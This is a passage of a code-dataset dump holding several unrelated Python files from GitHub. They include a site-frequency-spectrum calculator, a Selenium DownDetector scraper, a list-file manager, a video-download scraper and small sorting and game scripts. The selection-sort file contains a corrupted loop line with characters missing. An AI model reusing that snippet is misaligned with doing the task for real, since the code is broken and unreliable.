test(self, shutit):\n\n\t\treturn True\n\n\tdef finalize(self, shutit):\n\n\t\treturn True\n\n\tdef isinstalled(self, shutit):\n\n\t\treturn False\n\n\tdef start(self, shutit):\n\n\t\treturn True\n\n\tdef stop(self, shutit):\n\n\t\treturn True\n\ndef module():\n\treturn shutit_notary_trust_sandbox(\n\t\t'imiell.shutit_notary_trust_sandbox.shutit_notary_trust_sandbox', 1243692531.0001, \n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdelivery_methods=['bash'],\n\t\tdepends=['shutit.tk.setup','shutit-library.virtualbox.virtualbox.virtualbox','tk.shutit.vagrant.vagrant.vagrant']\n\t)\n","repo_name":"ianmiell/shutit-notary-trust-sandbox","sub_path":"shutit_notary_trust_sandbox.py","file_name":"shutit_notary_trust_sandbox.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24769558476","text":"import numpy as np\nsize = int(input(\"Enter the size of array:: \"))\narr = np.random.randint(1,1000,size=size)\n#np.set_printoptions(threshold=np.inf)\nprint(\"Original array::\",arr)\ndef selection_desc(array):\n i= 0\n while iarray[max_index]:\n max_index = j\n j+=1\n swap(array,i,max_index)\n i+=1\ndef swap(array,num,num2):\n array[num],array[num2] = array[num2],array[num]\nnp.set_printoptions(threshold=np.inf)\nselection_desc(arr)\nprint(\"Sorted descending array::\",arr)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/selection_desc.py","file_name":"selection_desc.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15862247720","text":"import os\nimport collections\nimport dendropy\nfrom sisterbayes import model\n\nclass SisterBayesSummaryStatsCalculator(object):\n\n def __init__(self, **kwargs):\n self.output_prefix = kwargs.pop(\"output_prefix\", \"sisterbayes\")\n self.is_unfolded_site_frequency_spectrum = kwargs.pop(\"is_unfolded_site_frequency_spectrum\", False)\n self.is_calculate_single_population_sfs = kwargs.pop(\"is_calculate_single_population_sfs\", False)\n self.is_calculate_joint_population_sfs = kwargs.pop(\"is_calculate_joint_population_sfs\", True)\n self.stat_label_prefix = kwargs.pop(\"stat_label_prefix\", \"stat\")\n self.supplemental_labels = kwargs.pop(\"supplemental_labels\", None)\n self.alignment_directory_head = kwargs.pop(\"alignment_directory_head\", None)\n self.field_delimiter = kwargs.pop(\"field_delimiter\", \"\\t\")\n self.is_concatenate_loci = kwargs.pop(\"is_concatenate_loci\", False)\n self.concatenated_locus_label = kwargs.pop(\"concatenated_locus_label\", None)\n self.is_normalize = kwargs.pop(\"is_normalize\", False)\n locus_info = kwargs.pop(\"locus_info\", None)\n params = kwargs.pop(\"params\", None) # ignore\n if locus_info:\n self.model = model.SisterBayesModel(params_d=None, locus_info=locus_info,)\n else:\n self.model = None\n if kwargs:\n raise Exception(\"Unrecognized configuration entries: {}\".format(kwargs))\n self.default_state_alphabet = dendropy.new_standard_state_alphabet(\"0123456789ACGTU\", case_sensitive=False)\n\n def read_data(self, filepath, datatype, schema, taxon_namespace=None):\n if not os.path.isabs(filepath) and self.alignment_directory_head is not None:\n filepath = os.path.join(self.alignment_directory_head, filepath)\n if datatype == \"dna\":\n data = dendropy.DnaCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace)\n elif datatype == \"standard\" or datatype == \"snp\":\n data = dendropy.StandardCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace,\n default_state_alphabet=self.default_state_alphabet)\n return data\n\n def _process_sequences(\n self,\n results_d,\n field_name_prefix,\n sequences,\n num_genes_deme0,\n num_genes_deme1,\n nsites):\n d0_sequences = sequences[:num_genes_deme0]\n d1_sequences = sequences[num_genes_deme0:]\n assert len(d0_sequences) == num_genes_deme0\n assert len(d1_sequences) == num_genes_deme1\n assert len(sequences) == num_genes_deme0 + num_genes_deme1\n jsfs = self.folded_joint_site_frequency_spectrum(\n d0_sequences=d0_sequences,\n d1_sequences=d1_sequences,)\n for row_idx in range(len(jsfs)):\n for col_idx in range(len(jsfs[row_idx])):\n raw_count = float(jsfs[row_idx][col_idx])\n if self.is_normalize:\n result_value = float(raw_count) / nsites\n else:\n result_value = raw_count\n results_d[\"{}.{}.{}\".format(field_name_prefix, row_idx, col_idx)] = result_value\n\n def write_summary_stats(self,\n dest=None,\n results_store=None,\n is_write_header=True,\n ):\n results_d = collections.OrderedDict()\n if self.supplemental_labels:\n for key in self.supplemental_labels:\n results_d[key] = self.supplemental_labels[key]\n for lineage_pair_idx, lineage_pair in enumerate(self.model.lineage_pairs):\n if self.is_concatenate_loci:\n if self.concatenated_locus_label:\n concatenated_locus_label = self.concatenated_locus_label\n else:\n concatenated_locus_label = model.compose_concatenated_locus_label(lineage_pair)\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n concatenated_locus_label,\n )\n num_genes_deme0 = None\n num_genes_deme1 = None\n nsites = 0\n master_data = dendropy.StandardCharacterMatrix(default_state_alphabet=self.default_state_alphabet)\n for locus_idx, locus_definition in enumerate(lineage_pair.locus_definitions):\n if num_genes_deme0 is None:\n num_genes_deme0 = locus_definition.num_genes_deme0\n num_genes_deme1 = locus_definition.num_genes_deme1\n else:\n if (num_genes_deme0 != locus_definition.num_genes_deme0) or (num_genes_deme0 != locus_definition.num_genes_deme0):\n raise ValueError(\"Cannot concatenate loci if number of samples per deme vary across loci\")\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\",\n taxon_namespace=master_data.taxon_namespace)\n nsites += locus_definition.num_sites\n master_data.extend_sequences(data, is_add_new_sequences=True)\n sequences = master_data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=num_genes_deme0,\n num_genes_deme1=num_genes_deme1,\n nsites=nsites,\n )\n else:\n for locus_definition in lineage_pair.locus_definitions:\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n locus_definition.locus_label)\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\")\n sequences = data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=locus_definition.num_genes_deme0,\n num_genes_deme1=locus_definition.num_genes_deme1,\n nsites=locus_definition.num_sites,\n )\n if is_write_header:\n dest.write(self.field_delimiter.join(results_d.keys()))\n dest.write(\"\\n\")\n dest.write(self.field_delimiter.join(\"{}\".format(v) for v in results_d.values()))\n dest.write(\"\\n\")\n return results_d\n\n def folded_joint_site_frequency_spectrum(self,\n d0_sequences,\n d1_sequences,\n is_discard_multiple_mutation_site=True):\n deme_sequences = (d0_sequences, d1_sequences)\n # weirdly, FastsimCoal2 puts first deme second axis, i.e. columns,\n # while second deme gets put on rows\n jsfs = [[0 for i in range(len(d0_sequences)+1)] for j in range(len(d1_sequences)+1)]\n num_demes = 2\n nsites = None\n deme_site_columns = []\n for deme_idx in range(num_demes):\n deme_sites = list(zip(*(s.symbols_as_list() for s in deme_sequences[deme_idx])))\n if nsites is None:\n nsites = len(deme_sites)\n else:\n assert len(deme_sites) == nsites\n deme_site_columns.append(deme_sites)\n for site_idx in range(len(deme_site_columns[0])):\n deme_counters = []\n pooled_counter = collections.Counter()\n for deme_idx in range(num_demes):\n deme_counter = collections.Counter(deme_site_columns[deme_idx][site_idx])\n deme_counters.append(deme_counter)\n pooled_counter.update(deme_counter)\n if len(pooled_counter) == 1:\n jsfs[0][0] += 1\n continue\n majority_allele = pooled_counter.most_common(1)[0][0]\n del pooled_counter[majority_allele]\n if is_discard_multiple_mutation_site and len(pooled_counter) > 1:\n continue\n for deme_idx in range(num_demes):\n del deme_counters[deme_idx][majority_allele]\n jsfs[sum(deme_counters[1].values())][sum(deme_counters[0].values())] += 1\n return jsfs\n","repo_name":"jeetsukumaran/SisterBayes","sub_path":"src/sisterbayes/sumstats.py","file_name":"sumstats.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32888653739","text":"import uuid\nfrom io import BytesIO\n\nimport validators\nfrom lib.common.errhelper import ErrHelper\nfrom PIL import Image\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nOK = \"no current problems\"\nDOWN = \"reports indicate problems\"\nWARNING = \"indicate possible problems\"\n\n\nclass DownDetector:\n \"\"\"\n A helper class for interacting with and scraping the downdetector.com website\n \"\"\"\n\n def __init__(self, output_dir=\"plugins/lib/common/tmp\", chart_wait=2, ads_wait=2):\n \"\"\"\n Initializes the DownDetector class\n :param output_dir: the directory to save the downloaded charts to\n :param chart_wait: the amount of time to wait for the chart to load\n :param ads_wait: the amount of time to wait for the ads to load\n \"\"\"\n self.output_dir = output_dir\n self.bad_characters = '\\\\/;*?\"<>$#@!|[}]{=^%'\n self.chart_wait = chart_wait\n self.ads_wait = ads_wait\n\n def chart(self, service, search=False):\n \"\"\"\n Gets the chart of a service from downdetector.com\n :param service: the service to get the chart for (e.g. \"escape-from-tarkov\")\n :param search: Defaults to False, set to True if you want to attempt to search for a service rather than an exact match on a service name - (e.g. \"escape from tarkav\" - with a typo)\n :return file_name: the path to the downloaded chart (String) - False if anything fails\n :return status: best effort guess of the status of the service (String)\n\n Note: The service can be found in the url after /status/ -> https://downdetector.com/status/escape-from-tarkov/\n\n Note: If the 'search' flag is set to True, the service will be searched for rather than a straight up GET call. If you can use the exact service name, it is recommended\n \"\"\"\n\n try:\n display = Display(visible=0, size=(1920, 1080))\n display.start()\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\"\n )\n\n # Initializing webdriver for Chrome with our options\n driver = webdriver.Chrome(options=options)\n\n # If the search flag was provided, we search for the service in DownDetector\n if search:\n driver.get(\n f\"https://downdetector.com/search/?q={service.replace(' ', '+')}\"\n )\n\n # If the search flag was not provided, we attempt to go directly to the service page\n else:\n driver.get(f\"https://downdetector.com/status/{service}/\")\n\n try:\n # If we used the search flag, check the page to ensure a result was found\n if search:\n # check the search input\n if self.bad_input(service):\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n return False, f\"❌ Bad search string: `{service}`\"\n\n # If the search returned no results, return None\n # dev note: the /search/ url stays if no results are found\n if \"/search/?q=\" in driver.current_url:\n return None, None\n\n # Wait for the chart to load\n WebDriverWait(driver, self.chart_wait).until(\n EC.presence_of_element_located((By.ID, \"chart-row\"))\n )\n except TimeoutException:\n # If the chart did not load, we have to exit\n return False, False\n\n # Wait for the ads banner to load and delete it if it does\n # NOTE: This is a hacky way to do this, but it works for now\n # If the element ID of the ads banner at the top of the DownDetector page changes, this will break\n # If the ads banner is not present, this should timeout and continue as usual\n try:\n # Wait for ads banner to load by looking for the element ID\n WebDriverWait(driver, self.ads_wait).until(\n EC.presence_of_element_located((By.ID, \"ad-leaderboard\"))\n )\n # If the ads banner is present, delete it so that we can capture a proper chart screenshot\n js_string = 'var element = document.getElementById(\"ad-leaderboard\");element.remove();'\n driver.execute_script(js_string)\n except TimeoutException:\n pass\n\n # Get the chart element\n chart_elem = driver.find_element(\n By.XPATH, \"//body/div[3]/div[2]/div[1]/div[2]/div[1]\"\n )\n\n # Get the sizes of the chart for cropping\n location = chart_elem.location\n size = chart_elem.size\n x = location[\"x\"]\n y = location[\"y\"]\n h = location[\"y\"] + size[\"height\"]\n w = location[\"x\"] + size[\"width\"]\n\n # Save the chart screenshot to memory\n p = driver.get_screenshot_as_png()\n\n # Open the captured image to crop it\n img_open = Image.open(BytesIO(p))\n\n # Crop the image\n img_crop = img_open.crop((x, y, w, h))\n\n # Save the cropped image\n # Example url https://downdetector.com/status/escape-from-tarkov/\n file_name = f\"{self.output_dir}/{service}-{uuid.uuid4()}.png\"\n img_crop.save(file_name)\n\n try:\n # Make a best effort attempt to get the status of the service from the page header\n page_header = driver.find_element(\n By.XPATH,\n \"/html[1]/body[1]/div[3]/div[2]/div[1]/div[1]/div[1]/div[1]\",\n )\n # Get the header text\n page_header_text = page_header.text.strip().lower()\n\n # Get and format the service name from the URL\n service_name = (\n driver.current_url.split(\"/status/\")[-1]\n .replace(\"-\", \" \")\n .replace(\"/\", \"\")\n )\n\n # Set the status based on the text of the header page\n if OK in page_header_text:\n status = f\"🟢 User reports do not indicate problems for **{service_name}**\"\n elif DOWN in page_header_text:\n status = f\"🔴 User reports indicate problems for **{service_name}**\"\n elif WARNING in page_header_text:\n status = f\"🟡 User reports indicate possible problems for **{service_name}**\"\n else:\n # unknown status, maybe DownDetector changed their page layout\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n except:\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n\n return file_name, status\n\n except Exception as error:\n ErrHelper().capture(error)\n\n # close browser in the case of an error\n driver.close()\n driver.quit()\n display.stop()\n\n return False, \"❌ A critical error occurred while trying to get the chart\"\n\n def bad_input(self, data):\n \"\"\"\n Helper function to check if provided data is 'bad'\n Bad could be data that is not a valid search string or malicious\n :param data: data to check (String)\n :return bool: true if bad data - false otherwise\n \"\"\"\n # If the provided input is a URL, it is bad\n if validators.url(data):\n return True\n\n # Check against our 'bad_characters' list\n for sub_string in self.bad_characters:\n if sub_string in data:\n # If a 'bad character' is found, return true\n return True\n\n # Add more check here...\n\n return False\n","repo_name":"GrantBirki/errbot","sub_path":"src/errbot/plugins/lib/common/down_detector.py","file_name":"down_detector.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"27686435831","text":"import os\n\n\ndef make_user_database(p):\n path = (str(p)[:5])\n print(path)\n is_exist = os.path.exists(\"data/\"+path)\n print(is_exist)\n if is_exist:\n message = \"Masz już swoją bazę, nie mogę utworzyć drugiej!\"\n if not is_exist:\n os.makedirs(\"data/\"+path)\n message = \"Utworzyłem dla Ciebie własną bazę - możesz tworzyć już swoje listy!\"\n return message\n\n\ndef check_user_database(p):\n path = (str(p)[:5])\n is_exist = os.path.exists(\"data/\" + path)\n if not is_exist:\n message = \"Nie widzę Twojej bazy - przed działaniem musisz ją utworzyć komendą .make_base\"\n return message\n if is_exist:\n return path\n\n\ndef checklist(dire, p):\n if p is None:\n p = 'main'\n print(p.isalnum())\n if p.isalnum() is False:\n message = \"Nie ma takiej listy - podano znaki niealfanumeryczne!\"\n code = 2\n return [message, code]\n p = p.lower()\n is_exist = os.path.exists(\"data/\"+dire+'/'+p+'.txt')\n if not is_exist:\n message = \"Nie ma takiej listy - musisz ją utworzyć komendą .add_list\"\n code = 1\n else:\n message = \"Widzę taką listę - zabieram się do działania!\"\n code = 0\n return [message, code]\n\n\ndef add_list(dire, p):\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n message = \"Taka lista już istnieje - nadpisz ją używając odpowiedniej komendy!\"\n return message\n else:\n print(\"Type of dire:\"+str(type(dire)))\n print(\"Type of p:\" + str(type(p)))\n if p is None:\n p = \"main\"\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'a') as f1:\n f1.write('p\\n')\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f2:\n line1 = f2.readline()\n f2.close()\n print(line1)\n message = \"Nie znalazłem takiej listy więc już ją tworzę!\"\n if line1 == 'p\\n':\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p + '\\n')\n f2.close()\n else:\n with open(\"data/\"+dire+\"/main.txt\", 'a') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p+'\\n')\n f2.close()\n return message\n\n\ndef copy_list(dire, p, c):\n if p is None or c is None:\n message = \"Nie podano mi wystarczająco argumentów!\"\n return message\n a = checklist(dire, p)[1]\n z = checklist(dire, c)[1]\n if a == 2 or z == 2:\n message = checklist(dire, p)[0]\n return message\n if z == 0:\n message = \"Lista podana jako nowa nazwa już istnieje jako lista!\"\n return message\n if a == 0:\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\"+dire+\"/\"+c+'.txt', 'a') as f2:\n for i in lines1:\n f2.write(i)\n f2.close()\n message = \"Skopiowałem listę \"+p+\" do \"+c+\"!\"\n return message\n else:\n message = \"Nie mogę skopiować listy która nie istnieje!\"\n return message\n\n\ndef remove_list(dire, p):\n if p is None:\n message = \"Nie podano mi którą listę usunąć!\"\n return message\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n os.remove(\"data/\"+dire+\"/\"+p+'.txt')\n message = \"Usunąłem listę \"+p+\"!\"\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if title != p+\"\\n\":\n f2.write(title)\n f2.close()\n else:\n message = \"Nie ma takiej listy!\"\n return message\n\n\ndef get_list(name):\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n return lines1\n\n\ndef parse_multiple_into_one(amount, li):\n onemes = \"List:\\n\"\n for i in range(amount):\n if i > 9:\n onemes += (str(i + 1) + \". \" + li[i])\n else:\n onemes += (str(i + 1) + \". \" + li[i])\n return onemes\n\n\ndef add_to_list(name, addon):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n if lines1[0] == \"p\\n\":\n with open(name + '.txt', 'w') as f1:\n f1.write(addon+'\\n')\n f1.close()\n else:\n with open(name + '.txt', 'a') as f1:\n f1.write(addon+'\\n')\n f1.close()\n\n\ndef remove_from_list(name, line):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n print(len(lines1))\n f1.close()\n if int(line) > len(lines1):\n message = \"Lista ma tylko \"+str(len(lines1))+\" wpisów!\"\n return message\n with open(name + '.txt', 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if index != int(line):\n f2.write(title)\n f2.close()\n message = \"Usunięto wpis!\"\n return message\n","repo_name":"Sedarius-1/Wahabot","sub_path":"fad.py","file_name":"fad.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16758367422","text":"#-*- coding: utf-8 -*-\n#构建并测试CART决策树模型\n\nimport pandas as pd #导入数据分析库\n\n\nquchu = u'F:/data/去除第一次样本集.csv'\nzengrong = u'F:/data/1.csv'\njianrong = u'F:/data/2.csv'\njianronghuifu = u'F:/data/3.csv'\nzanting = u'F:/data/4.csv'\nzantinghuifu = u'F:/data/5.csv'\ndata = pd.read_csv(zanting,encoding='gbk') #读取数据,数据的前三列是特征,第四列是标签\ndeal = {u'年初':1,u'年中':2,u'年末':3}\ndata[u'阶段'] = data[u'阶段'].map(lambda x : deal[x])\ntrain = data[data[u'申请执行月'] < 201602][u'是否容量变更']\ntest = data[data[u'申请执行月'] > 201602][u'是否容量变更']\ntest = test.tolist()\ntrain = train.tolist()\n# data = (data - data.mean(axis=0)) / (data.std(axis=0))\ntrain_data = data[data[u'申请执行月'] < 201602]\ntest_data = data[data[u'申请执行月'] > 201602]\ndel train_data[u'申请执行月']\ndel test_data[u'申请执行月']\ntrain_data = train_data.as_matrix()\ntest_data = test_data.as_matrix()\ntrain_data = (train_data - train_data.mean(axis=0)) / (train_data.std(axis=0))\ntest_data = (test_data - test_data.mean(axis=0)) / (test_data.std(axis=0))\n\n\n#构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier #导入决策树模型\n\ntree = DecisionTreeClassifier() #建立决策树模型\ntree.fit(train_data[:,:2], train) #训练\n\n#保存模型\n# from sklearn.externals import joblib\n# joblib.dump(tree, treefile)\n\nfrom prediction.cm_plot import * #导入自行编写的混淆矩阵可视化函数\ncm_plot(test, tree.predict(test_data[:,:2])).show() #显示混淆矩阵可视化结果\n#注意到Scikit-Learn使用predict方法直接给出预测结果。\n\nfrom sklearn.metrics import roc_curve #导入ROC曲线函数\nimport matplotlib.pyplot as plt\nfpr, tpr, thresholds = roc_curve(test, tree.predict_proba(test_data[:,:2])[:,1], pos_label=1)\nplt.plot(fpr, tpr, linewidth=2, label = 'ROC of CART', color = 'green') #作出ROC曲线\nplt.xlabel('False Positive Rate') #坐标轴标签\nplt.ylabel('True Positive Rate') #坐标轴标签\nplt.ylim(0,1.05) #边界范围\nplt.xlim(0,1.05) #边界范围\nplt.legend(loc=4) #图例\nplt.show() #显示作图结果","repo_name":"braveld/PythonProgram","sub_path":"after_classified/decision_tree_yongdian.py","file_name":"decision_tree_yongdian.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14731021857","text":"import hashlib\nimport random\nimport string\nimport time\nimport uuid\n\n\ndef gen_uuid():\n return str(uuid.uuid1())\n\n\ndef gen_id(node_type=''):\n if node_type == 'UNKNOWN':\n return None\n\n s = ''.join(random.sample(string.ascii_lowercase, 10))\n t = ''.join([s, random_date(), gen_uuid()])\n m = hashlib.md5()\n m.update(bytes(str(t)))\n ran_id = m.hexdigest()\n return ''.join([node_type, ran_id])\n\n\ndef random_date():\n a1 = (2000, 1, 1, 0, 0, 0, 0, 0, 0)\n a2 = (2018, 12, 31, 23, 59, 59, 0, 0, 0)\n\n start = time.mktime(a1)\n end = time.mktime(a2)\n\n t = random.randint(start, end)\n date_tuple = time.localtime(t)\n date = time.strftime(\"%Y-%m-%d\", date_tuple)\n return date\n\n\ndef random_int():\n return random.randint(10000, 10000000)\n\n\ndef random_index(rate):\n start = 0\n index = 0\n rand_num = random.randint(1, sum(rate))\n\n for index, scope in enumerate(rate):\n start += scope\n if rand_num <= start:\n break\n return index\n","repo_name":"jimxiang/knowledgemap","sub_path":"guarantee_relation/util/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36059604305","text":"import pygame\nimport sys\nimport time\n\nfrom game import step\nfrom game import print_grid\nfrom game import insert_life\nfrom game import BASE\nfrom game import create_grid\nfrom game import ALIVE, DEAD\n\n\nclass Rectangle(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n self.image = pygame.Surface([100, 100])\n self.image.fill((0, 0, 0))\n self.rect = self.image.get_rect()\n self.rect.topleft = [pos_x, pos_y]\n\n\n# Grid Setup\ngrid = create_grid()\nl1 = [15, 26, 34, 35, 36]\ninsert_life(grid, l1)\n# grid = play(grid)\nprint_grid(grid, BASE)\n\n# General Setup\npygame.init()\nclock = pygame.time.Clock()\n\n# Game Screen\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Sprite Animation\")\n\n# Creating the sprites and groups\nmoving_sprites = pygame.sprite.Group()\n\n\ndef pygame_step(grid, moving_sprites):\n moving_sprites.empty()\n for i in range(100):\n if grid[i] == ALIVE:\n j = i % BASE\n rectangle_tmp = Rectangle(j * BASE * BASE, (i-j) * BASE)\n moving_sprites.add(rectangle_tmp)\n print(i)\n print(j, \" \", i-j)\n print()\n\n\n# mainloop\n\"\"\"i = 0\nj = 0\"\"\"\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \"\"\"rectangle1.rect.topleft = [i, j*10]\n i += 1\n if i % 1000 == 0:\n i = 0\n j += 1\n print(i)\"\"\"\n\n pygame_step(grid, moving_sprites)\n grid = step(grid)\n\n screen.fill((0, 255, 255))\n moving_sprites.draw(screen)\n pygame.display.flip()\n\n # clock.tick(1000000)\n time.sleep(0.5)","repo_name":"lilAndy-bruh/Game_of_Life","sub_path":"pygame_intro.py","file_name":"pygame_intro.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33035751096","text":"# 定义索引转换过滤器(如果使用装饰器的方法定义过滤器,这里先得使用current_app进行关联,init文件中也要声明这个装饰器,相比很麻烦)\nimport functools\n\nfrom flask import session, current_app, g\n\nfrom Info.models import User\n\n\ndef index_convert(index):\n index_dict = {\n 1: \"first\",\n 2: \"second\",\n 3: \"third\"\n }\n return index_dict.get(index, \"\")\n\n\n\n# 查询用户登陆状态\ndef user_login_data(f):\n @functools.wraps(f) # 可以让闭包函数wrapper使用指定函数f的函数信息(如函数名__name__,文档注释__doc__)\n def wrapper(*args, **kwargs):\n # 判断用户是否登陆\n user_id = session.get(\"user_id\")\n user = None # 当某些极端情况下,user_id没有值,这样从库里就取不出数据,但是模板渲染里仍要传值,这时需要相当于对user进行初始化\n if user_id:\n # 根据user_id查询用户模型\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n\n # user = user.to_dict() if user else None # 因为这里只是用于验证用户是否登陆,不需要对user里的取值进行格式化\n\n g.user = user # 让g变量记录查询出的用户数据\n\n # 再执行原有的功能\n return f(*args, **kwargs)\n\n return wrapper\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73613993707","text":"from bs4 import BeautifulSoup\nimport re\nfrom urllib.request import Request, urlopen\nimport youtube_dl\n\ndef getWSHlinks(page):\n req = Request(page, headers={'User-Agent': 'Mozilla/5.0'})\n html_page = urlopen(req).read()\n\n soup = BeautifulSoup(html_page, 'html.parser')\n\n soup.body.find_all(\"time\")\n\n\n results = soup.find_all('a', attrs={\"class\":\"video-box\"})\n\n hrefs = []\n for x in results:\n #print(x.get('href'))\n hrefs.append(x.get('href'))\n return hrefs\n\nweekLongVidRefs = getWSHlinks(\"https://worldstarhiphop.com/videos/\")\nweekLongVidRefs.extend(getWSHlinks(\"https://worldstarhiphop.com/videos/?start=2\"))\n\nydl_opts = {}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(weekLongVidRefs)\nprint(len(weekLongVidRefs))\n","repo_name":"human3rr/scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2469821788","text":"\"\"\"\n给你一个整数 n ,对于 0 <= i <= n 中的每个 i ,计算其二进制表示中 1 的个数 ,返回一个长度为 n + 1 的数组 ans 作为答案。\n\neg1:\n输入:n = 2\n输出:[0,1,1]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n\neg2:\n输入:n = 5\n输出:[0,1,1,2,1,2]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n3 --> 11\n4 --> 100\n5 --> 101\n\n\"\"\"\nfrom typing import Optional, List\n\n\nclass Solution:\n def countBits(self, n: int) -> List[int]:\n bits = [0]\n high_bit = 0\n for i in range(1, n + 1):\n # 如果是1bit数,更新high_bit\n if i & (i - 1) == 0:\n high_bit = i\n # i 比 i - high_bit 多一个1bit位\n bits.append(bits[i - high_bit] + 1)\n return bits\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.countBits(5))\n","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/比特位计数.py","file_name":"比特位计数.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18868997744","text":"# imports\nimport json\nfrom transformers import PegasusForConditionalGeneration, PegasusTokenizer\nfrom argparse import ArgumentParser\nimport pytorch_lightning as pl\nimport torch\n\n\nclass PegasusLightning(pl.LightningModule):\n # Instantiate the model\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n # Do a forward pass through the model\n def forward(self, input_ids, **kwargs):\n return self.model(input_ids, **kwargs)\n\n def generate(self, text, eval_beams, early_stopping=True, max_len=64):\n ''' Function to generate text '''\n generated_ids = self.model.generate(\n text[\"input_ids\"],\n attention_mask=text[\"attention_mask\"],\n use_cache=True,\n num_beams=eval_beams,\n max_length=max_len,\n early_stopping=early_stopping,\n\n )\n return generated_ids\n\n def save_model(self, save_path):\n self.tokenizer.save_pretrained(save_path)\n self.model.save_pretrained(save_path)\n\n# -----------------------------------------------------------------------------------\n\n\ndef generate_(text, model_, tokenizer_):\n # Put the model on eval mode\n\n tokens = tokenizer_(text, padding='max_length',\n return_tensors=\"pt\", truncation=True, src_lang=\"de_DE\").to(\"cuda\")\n summary_ids = model_.generate_(\n tokens, eval_beams=4)\n with tokenizer_.as_target_tokenizer():\n output = ([tokenizer_.decode(g, skip_special_tokens=True,\n clean_up_tokenization_spaces=True, tgt_lang=\"de_DE\") for g in summary_ids])\n return 